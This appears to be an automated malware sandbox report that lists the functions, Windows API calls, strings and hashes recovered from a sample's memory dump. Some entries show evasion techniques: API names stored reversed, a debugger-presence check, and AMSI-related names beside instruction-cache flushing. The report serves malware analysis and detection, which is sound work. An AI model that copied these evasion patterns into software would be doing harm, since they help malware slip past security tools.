Opcode Fuzzy Hash: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
Instruction Fuzzy Hash: D1F02470AE4344B5FB10A2A47D46F59737C9B04F61FD08AE6F364A60D087F080D58B22

Function 02B1AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E

CharToOemA.USER32(?,?), ref: 02B1AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
Instruction ID: cd67eec1a3a1098d4bf84476c16d8bbd776bc182aef4047e66fea2fae9599612
Opcode Fuzzy Hash: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
Instruction Fuzzy Hash: 6C1157B2949200BEE200FBA4CD84F9B77EDAF44700FC04AA5BB44D70E0DA75E9048B62

Function 02B1E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: a3cc6e153ce983e7b2c7c9f98c5c4049d16f7b45067a4cf59daf37eb1b059021
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: F351F8759012299BCB26DB58CC84BD9B3BDAF49300F8045E5EA08E7211DB34EF858FA5

Function 02B13598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02B135B0
FPUMaskValue, xrefs: 02B135E4

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
Instruction ID: 1c8feb75da51fdae4d5dbbc4daf5c7511bdc75fdfd5cd9d1bc68a892e1d899d5
Opcode Fuzzy Hash: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
Instruction Fuzzy Hash: 1C01B575A54218BAEB11DF908D02BBD77ECDB08B00F9005E2BA04D7680F6B4A610CA59

Function 02B28274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
GetProcAddress.KERNEL32(?,?), ref: 02B282D9

Strings

sserddAcorPteG, xrefs: 02B2828F
Kernel32, xrefs: 02B282BC

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
Instruction ID: fefa0f00f46704f3d8e6587eaa5a468e34159a77987ba8ebfc0d3ee2de320403
Opcode Fuzzy Hash: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
Instruction Fuzzy Hash: 200162B5654304AFEB00EBA4DD41E9EB7FEEB48B10FA1C4E0F904D7604DA70A905DA28

Function 02B1AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68

Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
Instruction ID: 4600b78ba860fbead209e29b526e038162604ca901d989cbafc064485c8b12db
Opcode Fuzzy Hash: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
Instruction Fuzzy Hash: 5201F2B16116446FF612BA64CD11BAF776DDB81710FD101F0F510E66D8DA75AE00CA64

Function 02B1AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F

Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2

Strings

eeee, xrefs: 02B1AC3E
ggg, xrefs: 02B1AC15
yyyy, xrefs: 02B1AC25

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
Instruction ID: ee8bb3042f577d2e0c7255a6f09aca5ea51ad736c6efaadc0f55119a3c858ffe
Opcode Fuzzy Hash: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
Instruction Fuzzy Hash: F6419DB17055484BDB11EBB888906BFB3FBEF96300BE445E6D452C3394EB24F905CA65

Function 02B281CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Strings

KernelBASE, xrefs: 02B28205
AeldnaHeludoMteG, xrefs: 02B281E5

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35

Function 02B2F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700

Strings

IsDebuggerPresent, xrefs: 02B2F6FA
KernelBase, xrefs: 02B2F6E9

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114

Function 02B1C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B

Strings

kernel32.dll, xrefs: 02B1C475
GetDiskFreeSpaceExA, xrefs: 02B1C485

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A

Function 02B1E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
VariantClear.OLEAUT32(?), ref: 02B1E353

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4

Function 02B1AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
Instruction ID: d58cfe81125ad10bfdf3ba6542c7014e81ca62ecfa7c7af2931d1908ae09dd76
Opcode Fuzzy Hash: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
Instruction Fuzzy Hash: BB414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50

Function 02B1AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
Instruction ID: 1074368ccee03c30cad020c43305fa14c04f6342f3ac3594c4c1881c073b42c8
Opcode Fuzzy Hash: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
Instruction Fuzzy Hash: 7D415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E648E7241DB74AF84CF50

Function 02B11C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650

Function 02B194EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578

Strings

yyyy, xrefs: 02B1954D

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5

Function 02B28338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4

Strings

FlushInstructionCache, xrefs: 02B28351
Kernel32, xrefs: 02B28383

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29

Function 02B2AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
